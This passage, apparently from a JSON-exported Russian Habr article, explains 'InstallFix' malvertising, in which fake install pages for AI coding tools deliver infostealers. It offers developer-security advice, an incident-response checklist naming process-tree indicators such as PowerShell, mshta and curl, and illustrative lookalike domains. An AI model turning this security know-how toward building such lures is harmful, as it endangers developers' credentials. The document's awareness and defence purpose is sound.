registries;<\/p>\n<\/li>\n<li>\n<p>CI\/CD variables;<\/p>\n<\/li>\n<li>\n<p>deployment configs;<\/p>\n<\/li>\n<li>\n<p>signing keys;<\/p>\n<\/li>\n<li>\n<p>cloud credentials;<\/p>\n<\/li>\n<li>\n<p>kubeconfigs.<\/p>\n<\/li>\n<\/ul>\n<p>\u0415\u0441\u043b\u0438 infostealer \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u0442 browser tokens \u0438\u043b\u0438 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0435 credentials, \u0434\u0430\u043b\u044c\u0448\u0435 \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u0430\u0442\u044c supply chain incident.<\/p>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0431\u044b \u0434\u043e\u0431\u0430\u0432\u043b\u044f\u043b \u0432 Secure SDLC:<\/p>\n<ul>\n<li>\n<p>approved source list \u0434\u043b\u044f dev tools;<\/p>\n<\/li>\n<li>\n<p>\u0437\u0430\u043f\u0440\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 tools \u0438\u0437 sponsored results;<\/p>\n<\/li>\n<li>\n<p>internal installation docs;<\/p>\n<\/li>\n<li>\n<p>sandboxing \u0434\u043b\u044f \u043d\u043e\u0432\u044b\u0445 AI tools;<\/p>\n<\/li>\n<li>\n<p>endpoint telemetry \u043d\u0430 developer machines;<\/p>\n<\/li>\n<li>\n<p>least-privilege \u0434\u043b\u044f developer tokens;<\/p>\n<\/li>\n<li>\n<p>short-lived credentials;<\/p>\n<\/li>\n<li>\n<p>\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0435 accounts\/tokens \u0434\u043b\u044f production;<\/p>\n<\/li>\n<li>\n<p>\u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u0443\u044e \u0440\u0435\u0432\u0438\u0437\u0438\u044e local secrets \u0438 kubeconfigs.<\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u043e \u043d\u0435 \u201c\u0431\u043e\u0440\u044c\u0431\u0430 \u0441 Claude\u201d.<\/p>\n<p>\u042d\u0442\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u0430\u044f hygiene \u0432\u043e\u043a\u0440\u0443\u0433 developer workstation security.<\/p>\n<h3>\u041a\u043e\u0440\u043e\u0442\u043a\u0438\u0439 incident response checklist<\/h3>\n<p>\u0415\u0441\u043b\u0438 \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0443\u0436\u0435 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 install command:<\/p>\n<ol>\n<li>\n<p>\u041d\u0435 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0442\u044c \u0440\u0430\u0431\u043e\u0442\u0443 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0441\u0435\u0442\u044c \u0438\u043b\u0438 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c endpoint \u0447\u0435\u0440\u0435\u0437 EDR.<\/p>\n<\/li>\n<li>\n<p>\u0421\u043e\u0445\u0440\u0430\u043d\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443, URL, browser history, time window.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c process tree: browser, shell, PowerShell, mshta, cmd, curl, zsh.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c persistence: scheduled tasks, launch agents, startup items.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c outbound connections.<\/p>\n<\/li>\n<li>\n<p>\u0421\u0447\u0438\u0442\u0430\u0442\u044c browser sessions \u0438 tokens potentially compromised.<\/p>\n<\/li>\n<li>\n<p>\u0420\u043e\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c credentials: <\/p>\n<ul>\n<li>\n<p>Git;<\/p>\n<\/li>\n<li>\n<p>GitHub\/GitLab;<\/p>\n<\/li>\n<li>\n<p>cloud;<\/p>\n<\/li>\n<li>\n<p>registry;<\/p>\n<\/li>\n<li>\n<p>package manager;<\/p>\n<\/li>\n<li>\n<p>password manager session, \u0435\u0441\u043b\u0438 \u0435\u0441\u0442\u044c \u0440\u0438\u0441\u043a.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c recent repository activity.<\/p>\n<\/li>\n<li>\n<p>\u041f\u0435\u0440\u0435\u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c workstation, \u0435\u0441\u043b\u0438 \u043d\u0435\u0442 \u0443\u0432\u0435\u0440\u0435\u043d\u043d\u043e\u0441\u0442\u0438 \u0432 \u043f\u043e\u043b\u043d\u043e\u043c cleanup.<\/p>\n<\/li>\n<\/ol>\n<p>\u0413\u043b\u0430\u0432\u043d\u043e\u0435: \u0435\u0441\u043b\u0438 \u044d\u0442\u043e infostealer, \u043f\u0440\u043e\u0441\u0442\u043e\u0433\u043e \u201c\u0443\u0434\u0430\u043b\u0438\u043b \u0444\u0430\u0439\u043b\u201d \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043c\u0430\u043b\u043e.<\/p>\n<h3>\u0427\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0440\u0435\u0448\u0430\u0435\u0442<\/h3>\n<p>\u041f\u0440\u043e\u0432\u0435\u0440\u043a\u0430 install-\u043a\u043e\u043c\u0430\u043d\u0434 \u043d\u0435 \u0437\u0430\u043c\u0435\u043d\u044f\u0435\u0442:<\/p>\n<ul>\n<li>\n<p>endpoint protection;<\/p>\n<\/li>\n<li>\n<p>DNS filtering;<\/p>\n<\/li>\n<li>\n<p>secure web gateway;<\/p>\n<\/li>\n<li>\n<p>least privilege;<\/p>\n<\/li>\n<li>\n<p>secret rotation;<\/p>\n<\/li>\n<li>\n<p>EDR telemetry;<\/p>\n<\/li>\n<li>\n<p>software allowlisting;<\/p>\n<\/li>\n<li>\n<p>internal package mirrors;<\/p>\n<\/li>\n<li>\n<p>developer security training.<\/p>\n<\/li>\n<\/ul>\n<p>\u041d\u043e \u043e\u043d\u0430 \u0437\u0430\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043e\u0447\u0435\u043d\u044c \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u0443\u044e \u0434\u044b\u0440\u0443:<\/p>\n<pre><code>\u0447\u0435\u043b\u043e\u0432\u0435\u043a \u043d\u0435 \u0434\u043e\u043b\u0436\u0435\u043d \u0432\u0441\u043b\u0435\u043f\u0443\u044e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0438\u0437 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0430\u0448\u0435\u043b \u0447\u0435\u0440\u0435\u0437 \u0440\u0435\u043a\u043b\u0430\u043c\u0443<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<h3>\u041c\u043e\u0439 \u0432\u044b\u0432\u043e\u0434<\/h3>\n<p>InstallFix \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u0435\u043d \u043d\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e.<\/p>\n<p>\u041e\u043d \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u0435\u043d \u0442\u0435\u043c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 developer workflow.<\/p>\n<p>\u041c\u044b \u0441\u0430\u043c\u0438 \u043f\u0440\u0438\u0443\u0447\u0438\u043b\u0438 \u043b\u044e\u0434\u0435\u0439:<\/p>\n<pre><code>\u043a\u043e\u043f\u0438\u0440\u0443\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438\u0437 docs\u0432\u0441\u0442\u0430\u0432\u043b\u044f\u0439 \u0432 terminal\u0436\u043c\u0438 Enter<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u043f\u043e\u0434\u043c\u0435\u043d\u0438\u043b\u0438 docs.<\/p>\n<p>\u0418\u043b\u0438 \u043a\u043e\u043c\u0430\u043d\u0434\u0443.<\/p>\n<p>\u0418\u043b\u0438 clipboard value.<\/p>\n<p>\u0418 \u044d\u0442\u043e\u0433\u043e \u0443\u0436\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e.<\/p>\n<p>\u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u043f\u0440\u0430\u0432\u0438\u043b\u043e \u043f\u0440\u043e\u0441\u0442\u043e\u0435:<\/p>\n<pre><code>install command \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 = code execution<\/code><div class=\"code-explainer\"><a href=\"https:\/\/sourcecraft.dev\/\" class=\"tm-button code-explainer__link\" style=\"visibility: hidden;\"><img style=\"width:14px;height:14px;object-fit:cover;object-position:left;\"\/><\/a><\/div><\/pre>\n<p>\u041a \u043d\u0435\u0439 \u043d\u0430\u0434\u043e \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u044c\u0441\u044f \u043a\u0430\u043a \u043a \u043a\u043e\u0434\u0443:<\/p>\n<ul>\n<li>\n<p>\u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a;<\/p>\n<\/li>\n<li>\n<p>\u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0434\u043e\u043c\u0435\u043d;<\/p>\n<\/li>\n<li>\n<p>\u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u043f\u043e\u0441\u043b\u0435 paste;<\/p>\n<\/li>\n<li>\n<p>\u043d\u0435 \u0434\u043e\u0432\u0435\u0440\u044f\u0442\u044c sponsored results;<\/p>\n<\/li>\n<li>\n<p>\u043d\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u043d\u0435\u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0439 install.sh \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 secrets;<\/p>\n<\/li>\n<li>\n<p>\u0438\u043c\u0435\u0442\u044c internal approved path \u0434\u043b\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 tools.<\/p>\n<\/li>\n<\/ul>\n<p>\u042d\u0442\u043e \u043c\u0430\u043b\u0435\u043d\u044c\u043a\u0430\u044f \u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0430.<\/p>\n<p>\u041d\u043e \u043e\u043d\u0430 \u043c\u043e\u0436\u0435\u0442 \u043e\u0442\u0434\u0435\u043b\u044f\u0442\u044c \u043e\u0431\u044b\u0447\u043d\u0443\u044e \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0443 AI tool \u043e\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 infostealer \u043d\u0430 developer workstation.<\/p>\n<h3>\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438<\/h3>\n<ul>\n<li>\n<p>Push Security, InstallFix: <a href=\"https:\/\/pushsecurity.com\/blog\/installfix\/\" rel=\"noopener noreferrer nofollow\">https:\/\/pushsecurity.com\/blog\/installfix\/<\/a><\/p>\n<\/li>\n<li>\n<p>Kaspersky, Malware disguised as AI agents: <a href=\"https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/\" rel=\"noopener noreferrer nofollow\">https:\/\/www.kaspersky.com\/blog\/fake-ai-agents-infostealers\/55412\/<\/a><\/p>\n<\/li>\n<li>\n<p>Graphika, Malicious Commands: Fake Claude Code &amp; ChatGPT Installers: <a href=\"https:\/\/graphika.com\/posts\/malicious-commands-fake-claude-code-chatgpt-installers\" rel=\"noopener noreferrer nofollow\">https:\/\/graphika.com\/posts\/malicious-commands-fake-claude-code-chatgpt-installers<\/a><\/p>\n<\/li>\n<li>\n<p>TechRepublic summary: <a href=\"https:\/\/www.techrepublic.com\/article\/news-fake-claude-code-install-pages-malware-windows-macos\/\" rel=\"noopener noreferrer nofollow\">https:\/\/www.techrepublic.com\/article\/news-fake-claude-code-install-pages-malware-windows-macos\/<\/a><\/p>\n<\/li>\n<\/ul>\n<\/div>\n<p>\u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438 <a href=\"https:\/\/habr.com\/ru\/articles\/1032562\/\">https:\/\/habr.com\/ru\/articles\/1032562\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u041f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0440\u0430\u0437\u0431\u043e\u0440 InstallFix-\u0430\u0442\u0430\u043a\u0438: \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0438\u0449\u0435\u0442 AI-tool, \u043f\u043e\u043f\u0430\u0434\u0430\u0435\u0442 \u043d\u0430 \u0444\u0435\u0439\u043a\u043e\u0432\u0443\u044e \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043f\u0440\u0438\u0432\u044b\u0447\u043d\u0443\u044e terminal-\u043a\u043e\u043c\u0430\u043d\u0434\u0443, \u0430 \u0432\u043c\u0435\u0441\u0442\u043e installer \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 malware chain.\u0412\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0435\u042d\u0442\u043e \u043d\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Claude.\u0418 \u043d\u0435 \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u0440\u043e \u0442\u043e, \u0447\u0442\u043e \u201cAI-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u043e\u043f\u0430\u0441\u043d\u044b\u0435\u201d.\u042d\u0442\u043e \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043f\u0440\u043e \u0431\u043e\u043b\u0435\u0435 \u0441\u043a\u0443\u0447\u043d\u0443\u044e \u0438 \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u043e\u043b\u0435\u0435 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u0443\u044e \u0432\u0435\u0449\u044c:\u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043f\u0440\u0438\u0432\u044b\u043a\u043b\u0438 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b \u0438\u0437 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430 \u043f\u0440\u044f\u043c\u043e \u0432 \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0418 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0431\u0438\u0442\u044c \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u044d\u0442\u0443 \u043f\u0440\u0438\u0432\u044b\u0447\u043a\u0443.\u0420\u0430\u043d\u044c\u0448\u0435 \u0444\u0438\u0448\u0438\u043d\u0433 \u0447\u0430\u0449\u0435 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u043a\u0430\u043a \u043f\u0438\u0441\u044c\u043c\u043e, fake login page \u0438\u043b\u0438 \u201c\u0441\u043a\u0430\u0447\u0430\u0439\u0442\u0435 \u0432\u0430\u0436\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u201d.\u0421\u0435\u0439\u0447\u0430\u0441 \u0432 \u043c\u0438\u0440\u0435 developer tools \u0438 AI coding assistants \u043f\u043e\u044f\u0432\u0438\u043b\u0430\u0441\u044c \u0434\u0440\u0443\u0433\u0430\u044f \u0444\u043e\u0440\u043c\u0430:\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f install page\u0444\u0435\u0439\u043a\u043e\u0432\u0430\u044f \u043a\u043d\u043e\u043f\u043a\u0430 Copy\u043c\u0430\u043b\u0432\u0430\u0440\u044c \u0432\u043c\u0435\u0441\u0442\u043e install.sh\u0427\u0435\u043b\u043e\u0432\u0435\u043a \u043d\u0435 \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u043f\u043e\u0434\u043e\u0437\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435.\u041e\u043d \u043f\u0440\u043e\u0441\u0442\u043e \u0433\u0443\u0433\u043b\u0438\u0442 \u201cClaude Code install\u201d, \u0432\u0438\u0434\u0438\u0442 sponsored result, \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443, \u043f\u043e\u0445\u043e\u0436\u0443\u044e \u043d\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044e, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0435\u0435.\u0412\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043a\u0430\u043a \u043e\u0431\u044b\u0447\u043d\u0430\u044f \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 CLI tool.\u0410 \u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u044d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u043d\u0430\u0447\u0430\u043b\u043e infection chain.\u0427\u0442\u043e \u044d\u0442\u043e \u0437\u0430 \u043a\u043b\u0430\u0441\u0441 \u0430\u0442\u0430\u043aPush Security \u043d\u0430\u0437\u0432\u0430\u043b\u0438 \u044d\u0442\u043e\u0442 \u043f\u0430\u0442\u0442\u0435\u0440\u043d InstallFix.\u0418\u0434\u0435\u044f \u043f\u0440\u043e\u0441\u0442\u0430\u044f:\u0410\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0443 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e developer tool.\u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u043e\u0447\u0442\u0438 \u043a\u0430\u043a \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u0430\u044f \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u044f.\u0412\u043d\u0443\u0442\u0440\u0438 \u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f install-\u043a\u043e\u043c\u0430\u043d\u0434\u044b.\u0422\u0440\u0430\u0444\u0438\u043a \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Google Ads \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u043e\u0439 malvertising.\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0443 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0435\u0435 \u0441\u0430\u043c.\u0412\u043c\u0435\u0441\u0442\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u0433\u043e installer \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f malicious payload.\u042d\u0442\u043e \u0431\u043b\u0438\u0437\u043a\u043e \u043a ClickFix, \u043d\u043e pretext \u0434\u0440\u0443\u0433\u043e\u0439.\u0412 ClickFix \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0447\u0430\u0441\u0442\u043e \u0437\u0430\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u201c\u043f\u043e\u0447\u0438\u043d\u0438\u0442\u044c\u201d \u0447\u0442\u043e-\u0442\u043e: CAPTCHA, browser error, access issue.\u0412 InstallFix \u043d\u0438\u0447\u0435\u0433\u043e \u0447\u0438\u043d\u0438\u0442\u044c \u043d\u0435 \u043d\u0430\u0434\u043e.\u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0441\u0430\u043c \u0445\u043e\u0447\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0439 \u0441\u043e\u0444\u0442.\u042d\u0442\u043e \u0438 \u0434\u0435\u043b\u0430\u0435\u0442 \u0430\u0442\u0430\u043a\u0443 \u043d\u0435\u043f\u0440\u0438\u044f\u0442\u043d\u043e\u0439.\u041f\u043e\u0447\u0435\u043c\u0443 Claude \u0438 AI tools \u0441\u0442\u0430\u043b\u0438 \u0443\u0434\u043e\u0431\u043d\u043e\u0439 \u043f\u0440\u0438\u043c\u0430\u043d\u043a\u043e\u0439AI tooling \u0441\u0435\u0439\u0447\u0430\u0441 \u0440\u0430\u0441\u0442\u0435\u0442 \u043e\u0447\u0435\u043d\u044c \u0431\u044b\u0441\u0442\u0440\u043e.\u041b\u044e\u0434\u0438 \u0441\u0442\u0430\u0432\u044f\u0442 Claude Code, ChatGPT-related tools, Cursor plugins, MCP servers, agent frameworks, CLI wrappers, browser extensions, desktop clients.\u0418 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0432\u0441\u0435\u0433\u0434\u0430 \u044d\u0442\u043e \u0438\u0434\u0435\u0442 \u0447\u0435\u0440\u0435\u0437 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 approval.\u0412 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0442\u0430\u043a:\u043a\u043e\u043b\u043b\u0435\u0433\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0437\u0430\u0433\u0443\u0433\u043b\u0438\u043b install guide\u043d\u0430\u0448\u0435\u043b \u043f\u0435\u0440\u0432\u0443\u044e \u0441\u0441\u044b\u043b\u043a\u0443\u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043b \u043a\u043e\u043c\u0430\u043d\u0434\u0443\u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0414\u043b\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0435\u0433\u043e \u044d\u0442\u043e \u043f\u043e\u0447\u0442\u0438 \u0438\u0434\u0435\u0430\u043b\u044c\u043d\u0430\u044f \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f:\u0432\u044b\u0441\u043e\u043a\u0438\u0439 \u0438\u043d\u0442\u0435\u0440\u0435\u0441 \u043a \u043d\u043e\u0432\u043e\u043c\u0443 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0443;\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043e\u0436\u0438\u0434\u0430\u0435\u0442 \u0443\u0432\u0438\u0434\u0435\u0442\u044c terminal-\u043a\u043e\u043c\u0430\u043d\u0434\u0443;sponsored result \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u0448\u0435 \u043e\u0440\u0433\u0430\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0432\u044b\u0434\u0430\u0447\u0438;\u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u0446\u0438\u0438 \u043b\u0435\u0433\u043a\u043e \u043a\u043b\u043e\u043d\u0438\u0440\u0443\u0435\u0442\u0441\u044f;install command \u043c\u043e\u0436\u0435\u0442 \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u0442\u044c \u043f\u0440\u0430\u0432\u0434\u043e\u043f\u043e\u0434\u043e\u0431\u043d\u043e;\u043f\u043e\u0441\u043b\u0435 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0434\u0430\u0436\u0435 \u043f\u043e\u043f\u0430\u0441\u0442\u044c \u043d\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u0439 \u0441\u0430\u0439\u0442 \u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c.Kaspersky \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043f\u0438\u0441\u0430\u043b, \u0447\u0442\u043e \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0434\u0432\u0438\u0433\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 search ads \u0438 \u0438\u043c\u0438\u0442\u0438\u0440\u0443\u044e\u0442 installation instructions \u0434\u043b\u044f Claude Code. Push Security \u0442\u043e\u0436\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438 \u0444\u0435\u0439\u043a\u043e\u0432\u044b\u0435 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u044b, \u0433\u0434\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0435 \u0432\u0430\u0436\u043d\u043e\u0435 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u0441\u0430\u043c\u043e\u0439 install-\u043a\u043e\u043c\u0430\u043d\u0434\u0435.\u041a\u0435\u0439\u0441: \u0447\u0435\u043b\u043e\u0432\u0435\u043a \u0441\u0442\u0430\u0432\u0438\u0442 Claude \u0447\u0435\u0440\u0435\u0437 install.sh\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043c \u0440\u0435\u0430\u043b\u0438\u0441\u0442\u0438\u0447\u043d\u044b\u0439 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0439.\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0445\u043e\u0447\u0435\u0442 \u043f\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u044c AI coding assistant.\u041e\u043d \u0438\u0449\u0435\u0442:Claude Code install\u0412\u0432\u0435\u0440\u0445\u0443 \u0432\u044b\u0434\u0430\u0447\u0438 \u0432\u0438\u0434\u0438\u0442 sponsored result.\u0414\u043e\u043c\u0435\u043d \u0432\u044b\u0433\u043b\u044f\u0434\u0438\u0442 \u043f\u043e\u0447\u0442\u0438 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e:claude-code-docs.exampleclaude-code-install.exampleclaude-update.example\u0421\u0442\u0440\u0430\u043d\u0438\u0446\u0430 \u043f\u043e\u0445\u043e\u0436\u0430 \u043d\u0430 